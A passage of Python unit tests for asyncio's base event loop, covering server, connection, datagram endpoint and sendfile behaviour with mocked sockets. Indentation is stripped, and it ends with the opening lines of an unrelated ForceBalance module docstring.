'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
with self.assertWarns(DeprecationWarning):
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if not support.IPV6_ENABLED:
return
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
with self.assertWarns(DeprecationWarning):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
nifty.py | """@package forcebalance.nifty Nifty functions, intended to be imported by any module within ForceBalance.
Table of Contents:
- I/O formatting
